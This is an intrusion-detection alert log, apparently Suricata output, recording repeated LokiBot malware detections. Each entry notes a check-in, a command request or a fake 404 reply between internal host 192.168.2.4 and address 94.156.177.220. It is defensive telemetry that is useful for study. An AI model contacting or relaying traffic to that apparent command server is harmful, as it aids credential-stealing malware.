2024-10-25T10:20:19.310464+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:19.310464+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:19.310464+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.110799+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.110799+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.112566+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49749	TCP
2024-10-25T10:20:21.380407+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:21.380407+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:21.380407+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.349091+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.349091+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.355060+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49751	TCP
2024-10-25T10:20:22.549457+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:22.549457+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:22.549457+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.513082+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.513082+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.520665+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49752	TCP
2024-10-25T10:20:23.684073+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:23.684073+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:23.684073+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.651338+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.651338+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.657497+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49753	TCP
2024-10-25T10:20:24.816660+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:24.816660+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:24.816660+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.786050+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.786050+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.792079+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49754	TCP
2024-10-25T10:20:25.965151+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:25.965151+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:25.965151+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:26.954108+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:26.954108+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:26.959979+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49755	TCP
2024-10-25T10:20:27.717963+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:27.717963+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:27.717963+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:28.695330+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:28.695330+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:28.701325+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49756	TCP
2024-10-25T10:20:29.863609+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:29.863609+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:29.863609+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.839601+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.839601+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.845454+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49757	TCP
2024-10-25T10:20:30.997406+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:30.997406+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:30.997406+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.009821+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.009821+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.016207+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49758	TCP
2024-10-25T10:20:32.176322+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:32.176322+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:32.176322+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.139480+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.139480+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.145709+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49759	TCP
2024-10-25T10:20:33.687799+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:33.687799+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:33.687799+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.649766+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.649766+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.655827+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49760	TCP
2024-10-25T10:20:34.810261+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:34.810261+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:34.810261+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.764613+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.764613+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.772022+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49761	TCP
2024-10-25T10:20:35.916782+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:35.916782+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:35.916782+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:36.884487+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:36.884487+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:36.891188+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49762	TCP
2024-10-25T10:20:37.046303+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:37.046303+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:37.046303+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.036103+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.036103+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.041870+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49763	TCP
2024-10-25T10:20:38.200499+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:38.200499+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:38.200499+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.182221+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.182221+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.188082+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49764	TCP
2024-10-25T10:20:39.822243+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:39.822243+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:39.822243+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.795930+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.795930+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.802577+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49765	TCP
2024-10-25T10:20:40.950583+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:40.950583+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:40.950583+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.080957+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.080957+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.081150+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49766	TCP
2024-10-25T10:20:42.434571+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:42.434571+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:42.434571+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.413726+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.413726+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.419600+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49767	TCP
2024-10-25T10:20:43.576012+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:43.576012+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:43.576012+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.566821+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.566821+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.573607+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49768	TCP
2024-10-25T10:20:44.753726+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:44.753726+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:44.753726+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.730458+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.730458+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.954002+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49769	TCP
2024-10-25T10:20:45.967783+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:45.967783+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:45.967783+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:46.935092+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:46.935092+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:46.940955+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49770	TCP
2024-10-25T10:20:47.090625+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:47.090625+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:47.090625+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.041946+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.041946+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.048668+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49771	TCP
2024-10-25T10:20:48.628754+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:48.628754+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:48.628754+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.291568+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.291568+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.297262+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49772	TCP
2024-10-25T10:20:49.450869+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:49.450869+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:49.450869+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.444267+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.444267+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.450430+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49773	TCP
2024-10-25T10:20:50.632516+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:50.632516+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:50.632516+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:51.603400+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:51.603400+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:51.609517+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49774	TCP
2024-10-25T10:20:52.029076+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:52.029076+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:52.029076+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.016672+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.016672+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.022733+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49775	TCP
2024-10-25T10:20:53.168380+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:53.168380+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:53.168380+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.133034+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.133034+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.139132+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49776	TCP
2024-10-25T10:20:54.305428+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:54.305428+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:54.305428+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.280818+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.280818+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.287327+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49777	TCP
2024-10-25T10:20:55.471024+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:55.471024+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:55.471024+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.431956+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.431956+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.437553+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49779	TCP
2024-10-25T10:20:56.594180+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:56.594180+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:56.594180+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:57.593283+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:57.593283+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:57.600381+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49780	TCP
2024-10-25T10:20:58.015959+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:58.015959+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:58.015959+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.001743+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.001743+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.008492+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49782	TCP
2024-10-25T10:20:59.156243+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:20:59.156243+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:20:59.156243+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.130045+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.130045+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.135806+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49793	TCP
2024-10-25T10:21:00.311298+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:00.311298+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:00.311298+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.269869+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.269869+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.275786+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49799	TCP
2024-10-25T10:21:01.419074+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:01.419074+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:01.419074+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:02.412807+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:02.412807+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49805	94.156.177.220	80	TCP
